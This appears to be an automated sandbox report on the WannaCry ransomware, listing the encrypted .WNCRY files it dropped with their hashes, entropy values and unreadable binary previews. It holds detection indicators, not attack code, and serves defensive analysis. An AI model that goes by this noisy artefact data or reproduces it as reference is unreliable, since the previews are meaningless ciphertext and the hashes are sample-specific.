Preview:	WANACRY!......Qx.U.^.\|l.....L..............k...B....O.....J;p....WRd.d..'J.EG.....Y_....B(...<..X....>.o.D..r$o.t......Ho........n......V...<..$...................w.H_._..E.8..6J...`..%.Y.....S.F.4.&..E.=......&S.0...-..xU7...........$.uoP..,..(o.`.C....QHF.....K........]}u..X.y86..,c...\|......7...}f.-.2......R....0...X...{.6.K.....l.>...^/LK.V...g'#......2JV.C..~=:.P...m..U.MS..........0..~EB.Lt.-.o.+W....m.QL......X..G.........)...Q.U..8`...1.\..O...Y....s.....[.oR...T.m..8.Oa.b.6..Q\.-.n.l.....VWJ.}..l..9...N.Ip.Itd.....Bx./...i.F.k.........LN.(H...q.yF}..-j.h...J....y..2..g..,5.'...M.....bRpa.+]=...L.=....> ...B\..w.~u...,...bt.Nk...:...Q9..V..n.]p..~j..G.....- q5..F.G\.).....L....J{....R....D7..m...B.f.]G..7...........G...zM..+....T./..Z...U.hvQ.G...5.2.n.t...C.0X..Y...=.,E..WC".J.......n3.Pp.iCdzf.S...)uT.M..\|Hzw.H.Ru.....)%../.....89p.P..T.f...,.....TRo..U..'.;N..ng(.rk+.>.}EE....%.B...../Y n6........7....kYaw$..@..;.v.....$...>..t'j

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpnidm\5fc0968a.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	5240
Entropy (8bit):	7.9640867686784445
Encrypted:	false
SSDEEP:	96:o1xBlcXjNLAE6ug8YHq4JWECEvp11B7bBgL871DSChZz0lCS4i/r1W/zoALk2mka:ClEjN7+WECmP9gmFRS4i/r1kc2m0fO
MD5:	32CD082C6D1CF2A6FD37549E920B4119
SHA1:	3ECED1EBF1D06AAD3C8718DC762F6D9AE9560D4D
SHA-256:	BC88E594C5CB54326EC4DD73CDFCE4F43A1DAA70D00DE5C004D0EB3C39463CDF
SHA-512:	E7F843724DE792139795715ABB69AC95CAF9357F46AD28E7A1BCDD8BBDECF9F2414DB28DA96956F7AD093DC54E5B773459BE5AF6943E922261D2B0B929C12A7C
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....N.z...EA...<..<Q.K.).^.m..6.e'...D...q...g?.7.....(..y....z....:\/..M.E#j.>.......L-.O.F?mm /../..Y7.='.a.E.eedq...8....L......../K6KbK.xTn.K3..y..4.8......8...U...nl.in... ..<Oe...eA...~.s....s..[......./8.PV%.:..v.......G.b.G.:..JQ.)C...R.[.].Y..v.....X.........f.7bS......r..\v.....VW.....X..`..X.,.......L......tY.S.+....?.V.....kK.v.B...9.E.{.........y..a.J.b^........A)..LU'y 7..Ji{.......6m..?.=.IL.bR..u19...!`......n..BkV...Ww..q\OCj...5.......n.T'(..O.z.....9..1....Y..DI.(?.tN........:..:.4. #......?.RnZ5]\G{.....>..Y.1.P.&..~...O...<...gGj.8....W.7...Sa.%..-..PZ..T.O....7.'..'.KL.w...W'.w<...GF.`..l......r.h....lWT....\|..><..H...#.4E`..P...tLr%,....0BKF.\......T..{V....:..a.....j..6..y&......S}\|~~...`..\|f,...*.]...{{...>...6.c....v<$._ j.#.....:m.7.@+.Xf...`d.b.~....o.M..Dj^}...P<..bd^....m...5.n4..............KV..\|[.....~...#...>o............k^..O.e.SU.....p..Z....h...}......VrU...Q.x..\|g.;.....{...+Q.+.6.cE+.\|{..

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpnidm\70af9816.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	9736
Entropy (8bit):	7.981696009699221
Encrypted:	false
SSDEEP:	192:L/U6gmIATwPUaXpReno23KE0YRlk7TMCCtKP3A1l7X2hP7p3gfr1gPm2GPC8i:L/S+oXXCo2xLusCCt687X2esGPC8i
MD5:	C536133492DBE36D6DEEF7CA7E5F5940
SHA1:	311BB116C5AABF3269BEACA044D715F7D6DC572D
SHA-256:	FBF107850451F50AC9B04BC8F27C8DB435F5B8BCF2F5DD1D7EB571139E329E3D
SHA-512:	6A15209B4528C32723EA4271D21F78D8E67511D1E3449465273245CD1895B56FDF1FAD4EE4681018BAB8A6BB6DA2DA61A4C9901DDC5E38102E8D997FE794FE21
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!...............I.E...O..(.......S.n3.k.O.....N^..d4p......U1a#....1%..i.\|[?[...y ..(.3.;..+D]r>O.\J..X...1."..D.%u.../.A..6#....\|F.rAiK...../4....%.VB.,.#:Lj>z.....Kc.`@.O...#.....4.B.E...bY........\|..S..Os....Z......./.....i2../....`...^.~'.......$.......i.Ct.B73....V.v.VK.....`.KI.Q.)....F...I..vCeA...... 9\|t..3...gY&v..i...Y.H.p@..,...8.....p-.@.........x@...n....xt-.;.....siLW.j&..z....0R.g1.&..j.qN....C..jra.b..:...2....=&....L&...z.^..^.G......Q2S^H..;=.....:5.z...Z...P:9...V........WEh..;....w..].ji.M.....W..?..R.BJM...X.M+...p../.aqd..Kt.I..^.T4..\|.vW..e...6p`.5.1..J{'.....GIO.6.......X...G..../q\y.ft.R......z.0?..6.`.....q...r.4...G...eY.=.....W.....`=...k3!.d.(.g..........%$.....s/.yk.=.N.e.D'.j,....X....NJ......M.9.8he...=..[;m..I........?..C......x,......Tf.=.Q..1z...[......f$Y.Y...Rh.....b..Z..n8....IA^\j.M.. ~..7[.....4 ......cu..2...t....`$.1k.........d.C....i.U\.E6.2....2...e..2.>..".?......93....O.....cE'/.

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpnidm\8fce0f3.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	4552
Entropy (8bit):	7.95449897658305
Encrypted:	false
SSDEEP:	96:oAPIA6vg06Q94/HupTLeKyhpUtrzMCvEVnWoxx6h+Fvfu:yA696Q94/uvuhC5zMCvFSx6Y8
MD5:	CBF4B334FF837868D62DA2646110646C
SHA1:	46B61ABD3C46F72592DDDE91256B2A989CF52756
SHA-256:	EB2CC7D172E33D0F42631C50C79FF235A5A6A993518ABBA03430260E5953BAAC
SHA-512:	B8F30CC334BACCCF2EB20D484DDEE4C93422EF0F7C50BDA14B6BF7E1A0C1FD3E1AEEA9D4C60D56CF7814D28EDDFD9A07B7FAF2FE823E19FB94D305745C216338
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....f....).....p......(.1:...:.ut}..W....Q./.).@c.....H.Q.?......m.j$..j.<..H....H...Y.x.\|$....U.q...s..4..X. l..p.y...\|.....R...k.t.......X...<c..4.W}b3...G..... j..GGct....N..l...u$p@......\o0-O........,.S.7._a.-..Y..".J.."...P.?.#.=...z....uZ. .................t...%E.LL.b......e!T.F.....{.t.A...`......... +(....(b.G.g...F.TT.W2I..a^EV..{([7.y...>.....k .0.....B^.;.].w7.....q/...:&5Q.;K...3$..M..9V........E'\hD..E...z..V..F.o....z..Q.V..KVpo.t,....,..P.........k..j.Z...sX=....}E......du...<...jMa...P.e..%...`.GK.^...Q4.K.BE.j..z......G..j..<...b9.$Q..>.x..G..bUc6.{q.Ly..vq)@.4=.VA.5..q...g>.\....v.6dn.H.........../..Ky....a...k,.....gr.28...Z.m.{Z.4..U..(m/F..@V.......;m.a..Q....(X8.i.9C.i6...n@T..SW.bQwJ.J......n}...K.^.n.q..$.X...r.w.E-.....0.,.\|m...Xb.........XH9:..p^-o..OHs...,.>.:..%..Z.9...e.(K......_..efEbZu.......`'..W..a.wM$h...a.45.!d^c.^.\w7..v......f.*.....?.(..4...i=w0H!W..v..M...);]N%.....\|Qa.4../...[.:.......=h..ZX.....R.(...

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	277304
Entropy (8bit):	7.999290997832996
Encrypted:	true
SSDEEP:	6144:9imgqqA2RtFTh6poJShXPiwREmpeR4T0JX/gQCi2w:AX82RxwtqgEmkRu+ow
MD5:	69A96C2C908CA44764DCC07C076E2005
SHA1:	1E7FABB2202EAC6B95630D305D5EC138623D290A
SHA-256:	4399BF94E3B5B46CE45FEC2D66C8A76591215D2969098F69AD8C55879C509219
SHA-512:	7F68B72BA82B9077243AD50E36FBD5AB6857BEE7596CC02EEC31B4FED288FDD4F3F5328EB5E95A7AF3BC3ED7E94FE2DEE42795097A22B38A2109E2C5F142C88A
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!........&c...:r....6.XM;,.J..W=....T[...%...mcQ)e{......J.X.%QN...E..Eq.;..UUU....4 ...'..?3j.N.1.&.F{.{oF..FcL.w:....p:.>.y.Z.........%.?.[.H`pc..7....... ..X?@k.l.....-...:...J.C.tCu.z.h.\|........7..[@.<.J.2..w).LP\|.....7.0.&.i...y{...]../.' .].....:......s.Ni...hiR..,.o..%.9H...B..\|..T.....@.:~..'.A}..a[....`..7.`ap.;..xz.~.b.9U./.......8....@..m.....]...{[>.~.....f0...Q...T..3.E.('..8......A{5kw3..lb..2V..S+[._kO....t.....OM..j%..mH.8q..v..L.M.....&......"3..P........[.\|..m.#.0...T...I.b........ac9,,=[..k...KA.Cl+......._......x..p.d#...v.3.1`.2.H.[...)r$.:..l.\|S.G......@.P..AH.\{...%...]?...{m%...;.Z....W.:...\|(.P.[..A..P.R...[....l.O.O......;...J.J......46..6...N.q.a....=.....cq.e..`+.y..O....xk....Ay#i......M3.".u.(.B...v..v.9...@.....B .........v......v.....~.}.-9.wQ1.MN/.......Pt..E.. ..V.j.jZ...6...2.El......\..X\|i...1.yb....u.N}2...x..X.4..kN._.z..;..*.........nW~kG...v!........0...68G.F".......b..V.b....N.`.>.<I.u..

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	27000
Entropy (8bit):	7.993727844877068
Encrypted:	true
SSDEEP:	768:B64SOYTw4S9+Dq/dnfPOk4GdP9uwagcl6DteBkP:XCM44IERP8GdPM1gczB+
MD5:	88E1103295C4E1FB836C3498D677D218
SHA1:	802BD8E75CA591F4FEF0BA32E3C5E93B8DD1E310
SHA-256:	7A9E90A9ECF100A03610286FC9360D717707F0615163F544FF973685BDE86F13
SHA-512:	1935EB5BD62682D51CB2CD1B45C95FCFD90AB0C9D711B981AD4114ADA8AE3C5DFA60350951E9EAAF81B47115CF5B31650B2AA072820F4BC1F17FC2FE8DB45290
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!........_m.\|.6q....7.{1.I.s.....#p..w.i...I..=>.[....T..<..x3...U..X.lc..bz..hq.\|.05.5.v....\..G.q0\.BJ..{..CSE.0......`.S.....Wx4..,..%C....M.."......?..xm(y..\|....e..B..m.L.t.D....}N.........K.....\|....;...=....i...>,.!....HG..U\....^.;^.B....Th.........M.r9..o....B........b....Gx...o......5?,,. ...K"..fK....3e.lakH...{..z.q....Jwv.78.G..0B...I.'.......v3:.;...6...H....).\Y..jA.%......Wc:Zn...O...sD..4YU..,..U...;.I..p..b.]v...d..g.e..X$.....zG..P....Pj.a."....o.Y.%...).WB..1tj....#.I..f.....z.p...[]W#.=i.>Z....q..Q.....n .U......#..{...Z6.._.c.s...,...eU..G.'.u..J.. ..i..,:?[..M......L;.7.f.........-...4c/.F.Y..0.5W.[K..`.'.../....x.KrW..b>......QB{.......Y&6..\....Y.\|k...M.k.~(}9.........j..{PK,b..-~.0.1h.....s3.O..Iu`....l..0...^.%.=.'Q..5s..P.\|4...g.cF.X@..y..D...........Ses..[..!.[2+.P..:S{..UEH.q:.5AyO.SQ....I!Cgf...L.86..`.A4'+.....NTw.....S^.=...~T.4.../KQ...A}.6\|..n.s..g...y$'..t.g..8.x..../...9.<g....%

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	164584
Entropy (8bit):	7.998874633990367
Encrypted:	true
SSDEEP:	3072:VzxYPB4+AhhHH7xEJLyFdQVzzRwsAIvC8kJAFRVdF6dJxWM3e03m:V4B2LuZyAzz+7IgJAFRVL6PwMxm
MD5:	6338ABF399C9900FC1014A7E01CADC85
SHA1:	0D79209199FE1093BC7FDC963527EE6F53C0A3BE
SHA-256:	A7CB061FB98D48BD0CFD867E91328069500A18DDEEE0AF9EF2BFB61027F45BBC
SHA-512:	E1DB9AE6AA20DE50D016509BC072950892AC4B72E7E904800C028D70669613509B93CD82E6594578F8F68175C722E4D7CBC6D15197A6CB0971E10A18352EC110
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......;..Kw......`...m.2C.>~..v..fL;.vC:..4$.\|..e.u>..yQenH.#h........K...LHq..x.....9c.K:..P..d.K.}..A...T..u....J.h.@..._...Zi.K..A.........m..?..h.n..........7.h...UPx.....Q2.X...X...W.....@K....4&{zB..w.....#....S.D.1.....,.'<w..c....R#vE..Y............o.)!..7...3..ao:9!....E......Vd=P.F...oh.rP;..=n.7.\..:;..0.$E...[..G..8.%a...P..d.%...H!..ab..E;.).....]D7...3+..l"=............1.....7.'I.;.....y......... ...S....b&..n..f8.pD..qxk.....A.s..\...o@..R.8($.}..vs.5HJ..m....:NC........N@Z.......w^..?....$\|...j2.z.h.....Q.d.".......lbV...g.r....b.h....B.......>N..Z..nX.5.k{^..f.W..yF..:.2...'.Sd.....^.mP.$.?I..}O..bK{. ...Y..H.d2..K/Z&..Is..=bE.Z......:...o.........%`2th.......O.....5.#0.hZ...&-....3.ha..f{X..u(9.Ui......#.......V.k.jC.A. z..8...0N... ...B..[;oa..4...... ..x>..;.C_..&........$...-...da...\A+@..\|.~H.B.r...........H..5..gA.K..?. .y......9C..).).k:S.6.L..+....T......G1?f..c.la..!.R]"..v.k...W,.....^.../..n.)........

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	24904
Entropy (8bit):	7.992308584650091
Encrypted:	true
SSDEEP:	768:twDr13erZQVpYJUaS5MhlMhuh4OJLR94zoO:twFwZQAJhSIlM0h4OJD4zoO
MD5:	6A97732821EA6AB8BEDB9DAEA259964B
SHA1:	1768C4F1A2C7070E397AE0FA3E9633BB7567FEBC
SHA-256:	F639712D0EEBECD5F8F4EBF06AE858820E46D7304483CDD04DEDE1B3B4A58535
SHA-512:	76C2B022741B9E66362DFD66E503CBCB130E673FB4396F9BA4993F081B43A1DCDCB3A08153F3C557490ECBCACDF756586FFC71321BB76248BDC4C3BD98DAFBA1
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....?.P<...f.....Q.Tc...+7.\|.d.._...............C...V.}.n.cJ:Q.d.......;......;..".... .C.E$.D...b.......Z....n...6...\.Sg...=.=8O...B.S2s....u....F<....",......<@.....k.m..).y\.Z....y..~....i...I......".......B9....yz%.HR.R,..4.%.Dl.........../`......_.4.......R.K.\|.St..6.\....J(.U..R~pBy.-......;..J...&..d;n.C...BB......hH.x..kb.G+..c..(..B5.....".@.,...e....(.?Ir....y.....'[.._/.Z...Z.T0...5(.].h.JZ...D".4..}..+<l.\|!v.dg._..0...&."...........t!..SlVK..f....}rdL.=Fn._.O...E..bC=....g.t.$A.&.EN..L...\..{.za.;2.&..d.....o]....:q.Pbt[..QF.>q....i ......C#...<@PaO.X}z.sj....f..\|FueD.."..QD......4...KY..U...)..].".A?.@#........K4..S?,.x..E.Q.m..=.O.%\...J.La...P..N0...f>...d.v....F}...5.zl.y....m3.....Z....$)...\..\G.l.*.K.g.i.2..lw3VJI...mx......]%....3...2..)%...e...@......0.+..e...)w.Ct..ma.(o..XX.f@.sX..I.."P.g.K...s..,.\..%.}.?.B..S.:.j.W..$>.......[kf.{....DB...!..... .A.`...a...:z...i.s....Rc.)...{.I.o...%.N....?w.e..7O

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	690472
Entropy (8bit):	7.999748708556809
Encrypted:	true
SSDEEP:	12288:ofmVLw6dV2mh9cu5rOybapzgV5OjmxZfSPR086gneg00Ym+l7fOg8us2tse8Hk:of68odlbYY7xZ6p08eoYXDH83i
MD5:	F2FFCE586A3CFF0AD4903E5C0C3D4B4B
SHA1:	77C7F76DAD6DF0FB972370BCBA4BA347A3D75F71
SHA-256:	1C2D08D295CD94E9DB47B1D08818642117000599539A1AFA68AA1B51756DA8CF
SHA-512:	C460BE10BAE0640A9D0C1727316FFC4D077481FFD8EAFD8EA7EB8C6D4EBF32D1C1D8CF505A16CB56507C63991A71E4B63BAC9C9505CAEADE9C9FED53B3F65723
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.......~\{..`=..n.........MP6.AOF.`@......4u?.uZ....o..4..&V5..8.TV.C.....]..aGI-2.R. ._.)..... ..".V..Yv.....Q(...pAM.F..X......#..:.. gY..../~.>..[E\|.+Ri)A#..9..T.6..h.5.J).jfJ.V[..+T.....J.\bF2.T\..8.U,..I).NRbT......{9/.Y.e.Y.<.......O+..B .....................1....y. .uF.B7..-..1.#...^x.Vi.3.c.?7..........H........."Y..2G..}..$`........p....9...r.Mif0..cc....'....hW[d.o..I.:.z..S... \7~...$~.I.&..a..2\|..=.q.ed7.D....?....w...+...../..4\H4..\Zk.......8...rF..)B,z..!.,..~.....R..O4......t.........j.k..\.nt+.:../.N-..nn..M..BK mu.z. s0.......~S...1us......8A...`........9.n_J.v....D.e.2w......k.....AF....;.y.....R!......../..dU .jfX5.@./.z._g..9.."..P.[.....}..A...!.....h....h..y9.J..3s..^7.\..kfo..M!@...O..oJ.KuMP....,1R0..9u..0..].Z.@......D..H.......7p@3.@.lNa?..:.a'.8mCXA........Ua{. ]..............h.B./....j...:...'.d b..D..).p...f..2.%..-...W.P}c...e....G......>U...eT..w...:J.dp..R..EO+5'.......!U.?(.[.....9. .E...

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\Flighting\FlightingLogging.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1816
Entropy (8bit):	7.891205575733303
Encrypted:	false
SSDEEP:	48:bkH1WD/Qjs2s/kKyiWoudxhni0LnGFxYudIk97Ku9o:oH1I/L2sMK5mTL62jk97o
MD5:	ADB41EA8279C27EB76BA4A113DC41DB2
SHA1:	A6B5D161F4EE5B655BEE8C508EDCA9866E73BC17
SHA-256:	27F8741E3BB55A9AE1EFDD2E3E71506AF8D12CC85F7064C68DCDFBB1C29C39F5
SHA-512:	5CA8EA7556A0978C0CA3807447B6BE58B36A1ECD1594CA2F5D46D0393014509C4E703FDBFA84947D5C2C39F4BF60B21FAB953483FCE1C527F0344F606DCDE1DD
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....$a..Z...u.KJ.A......#.ta.......t...9....'gzt.Fu1...................e....?r[..IR...R.M.k.q.....)...=.A.9.4.....l.'....n_.R.........w.W.".?Q....:..K..H.....W.=.....@...Z..`.x..m.C.&_.9.........G....%....Ja.......A.A...dH[...K...Kh#1."..M.R.-..d............X#.w.!V.c.z..V:rZ..wE.m...w~m!.\.I......PK.Pz....:.L..z..7..v.i).......{.1\..D....^/ 9s. ......t.{g\|f...Rsp_.(.J...uq..9V..H...p.d{.~.$3.U...7..z...-{1x..Ff.T.Y..rO.A..b....~.......0..9.uVZ2.]...Bf;.0..{..c........6.i.~.A.4..0(C........C..B.C.t/.....@.:. ..=..R,2..xSM./.qv^...L.....w....u.!N..~.>....R......5j~....8...N:...s..!...O./{........J..t_...*.C.......>.b..k.!(.$.............0...H&..rzh\.u..D.....tC.{gW3L...[....>.?...].6...d.S.-A.&.N....Ke....+....#2..O.y....."...h}..y.H.S..a...z...6.5z.k8-:!YfDj.d.n...7..t.j].i.....y.[.....'"..L.t....k.gO......M.:...\|\..T.g.~............ $.h..~....7.I0'{..b.M.&.M .a..J8.-Q....D1..)Pu..%...>........\|hg...q3.]$.o%.../..f..^.i.....^

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366672597747525.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	113208
Entropy (8bit):	7.99822487779402
Encrypted:	true
SSDEEP:	3072:72K2F+hbraz0ZzHG1JIXE3BMMj0/qB5T4wkB/:72K2Ehf3wwcMMuqB5kwE/
MD5:	E2B934590363B62DBF8878EC90988AF6
SHA1:	EB1E00A2CF99791DD4106CD4E57A90DFDAD20E50
SHA-256:	9148E8FED89A661197CDBAD803F8532A92E56E90D3E1F527961ED257FDBF41E6
SHA-512:	C48ED35BC0A3B0669A5AE831B4E76A302F8DE2B6153D47415586EDD53A9CD3D356E89888130640D4052FC26532F4C583FEF35A9130ECA75CC2F6B454A168A5C6
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....G..........xW....w.I.......w......%.....2+..By.X.rx..d.0...).d....P}..we....$....\|...&a..9;~:.jz..T......]R........~z.;....;..K%....W.e...^.(.n".f.m.....Z.;k...,...H^.........1...o.q8f?..X..'}aP.....h.....&.= ..\|4....+k9.>...........-~...[I.............p.".....\..R.....3...o``.J...GI.3y....."M3.....A.._.]).Vz.j.....S..h~.M...i...L.s.........R.Gs...x..v.z.....p..C.z..w{P%X;o........i......@8..".].QB..E.JL1..u..^...1]k..1-.^.......P&..h.]T.s.;..T..a.....Y..8.:..l.....yO..W..J.g.6.`.......}..j..j5B..S.7.....<......3.;.H.E.#.#...q8@.wB.......W.q..X.1.,,.....Xw.%bF9.(>a.R.t.....7bt.<...:3N.Qk.'.ic.._...=...?..1`WW..:....6...Zy..S..1Oh~..L...^. ..v..UF.9....yEN....qv.Y:.[{.4.(..P;..7.......u..Y...9#..C...d.D2...y.I.KT.w..C....(GL4.._.x.K.....a`.>.e.....g_..x....j.j.f..&.6.9[..w.&..OI ..KMT...l..(..M5...wD.... .vn.....N;........H....E)7.N..N.L..0._<.9m. .Z.4pq>.cH>?[.P.d.i\?..t...2....=..F.....$.2.*..a...2...Hg.zf...[...\|....

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673054843582.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	111944
Entropy (8bit):	7.998212896667005
Encrypted:	true
SSDEEP:	1536:Neil9AxnwmZH3u9/3Cfhf1zyKnxqyNpcKVAyQMYV9ysFImz1ubwDPbKp1tC31:PcnwmZHe9vCfl1umnNpzBQr4k51T4Y1
MD5:	CF66BA9DDD041CA7FF801E1F7590349B
SHA1:	C36822F67F80B824F91C74F38EDC76B7A9947BEC
SHA-256:	A9F400C262967D3E007E8016340192A77E974856B358BE347DF3CCCD6F834247
SHA-512:	B43309BFF26C653FE568115BB72F4C0C3F6453F4974785A5E86C46928144718626F909DBAB1D10F63D7D1399808811BF8EB17FF406AB5D169F2A5A949E47B671
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!...... ..u..{....at.`...r.JO.....bfR._.!...i........Y......$E.W..M.%.....86.o.....~.B.....!.........^S.=9/P...."...G......{t..-g9]UF..7c.>4._...55b...<.....k$.....^$...,E.\|h.H......bJ..F..7.}.9@...T.....<.C..(.h.Z.N.'.;.u.U..........h....n.E......#.......<.E>...%.......$&.\.w.d.!....Z.{.......T .]Z..Vp.G...C.....4uS;.j..........5. .=G..S....%...;6.....n3.....,..\.Y.......<...bK..j..q_.k.2...^2;.Z.......fA.w..j.....Z......PT/j.qP.]i%....+,4.Q]...n...5<8...u.o.A.id.\|....gx.....?..;..-.3....?w+.\.1=..,..z.\|.....&O q.In...r...`.k.U5<..#]l....lR.3........!.6..y.ol....&k......}..Q.&......K6.H.X.]=...D:s.G,.....St..2.....C.L/......J....(.#..Bu)....&..t...v.a}!.y....!h....E........Q\..eQ@.m...0`A"......A..8R..'......hw..6<...wC.".."TY.-.b4.G...Jd...6s=b%..i...bk.}.9AKD..6_.o..... ..s.DC.....\|Pr...8......=..R...q}z.z26.D.` .....]w.....Z0"Cv...K...a..~.....LwL......b3..q.U%a.1..3l.g.)...aM..H...Vr.6..g..[.G....a.H..t.....#..K.B....a.?..

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673354927603.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	111944
Entropy (8bit):	7.998460799127424
Encrypted:	true
SSDEEP:	3072:xxG+2w+SWXheu9SpVIedAoAeyi1ZYCL7JOobG9V2A:C+J+SWXUu0VIedMeyi1ZYC3JOobG/X
MD5:	7710960C37227EC5586FE9FA7FDF5EAC
SHA1:	FD703B4AC57B5670E7AEB339F25DC9710D201524
SHA-256:	494724C309DBA771866913C299D56C99C549794A1DD79840817CC20EA28FC6A1
SHA-512:	2F0A4A2E524E0F755407DD707C533EF5C84A4676196FF75C23DB4CC328943E775BEEDD2594FC914AA4149593E669DF3682231A16A56444BAAB51DAB667AA8F30
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....4.\....],(..M.9.Yw...bXS.M.A.Q".Bd>7.T.n..."`V..gm..+>.-+..?^..~..S..........=[....a.P....x....,s....VN.A.=w..K^.x.Ui]..Iys.F..j......R..eE'..Ru._..k..u..%d....f.hL...>.{\.w.z..t/.-.........6F...B.Y{g.jig..<o.....X.#\|kl.._.'..e....$r$:.;PX/(N.\...?......#........G..-..dz...yv. ...4%.:.p...M...\..73%.N..U......K.w..DHc;...R4..TTB.y...S.P$.......tu.-X.Dd.9..r\|<so.........w.[..5.J.iZ[........T.O.>..I...C./d.....F.v.Io..%.M....Nc..4.X..S.l.. S.EQ..-m.v.W....~....m}B..t&....Isr.M&0.3}..Z.....L!.b.3dT.U...".#..a....7...@Jm.S.Vl.p..j+...S..........4.P...>....i.'..G....E...\.j.J.\Vk7m@......0....`_.E.E.!..7...t../.V...p.UxY.9#...>~......../..s../.c.Q.......-)HB..z..s+.h...Z\..^..V....ti....HEap.....:e..[.$...$...{../(..........=.C..:.n...I.z.h.l.i8..L.L...V..k.Q....u.O.".ELI....r....D.gF..T.~."%q..X.......okg.>..c.]..`.2.).....m..".4.L...E....!p..0./.t.x.G.. .N%+...*.P..<F....M.$..]T..h.VcpWcnU..).S........l&<B......i....1X..Ad.O&I...}.

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_05_51_5411.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	7.8587199757966655
Encrypted:	false
SSDEEP:	48:bkQkiBvTz38g2qtUeP9FEyNqPYw/E0c8jiQ0WCjVLYKlAibohHO:oQkgzseP9FEHsKjiU8LeisO
MD5:	D4BD5C516892E150E89EAFA6F1911348
SHA1:	C97A2CE4E0EC58B4E2B95FE2C03B8319E694DC25
SHA-256:	8B1983B5D98059929804205619CF64E819343F8563616BF76E9B65CB6AEBE979
SHA-512:	A84867E28603AD88A620D43605FB31CC521696E59EA1D732C11F0A7732EC7FCC28013C8A0C5AE9E48B3F4CA8CACDB2A1BF7786BF52ADDE15FB3F3E239BA99A24
Malicious:	false
Reputation:	unknown
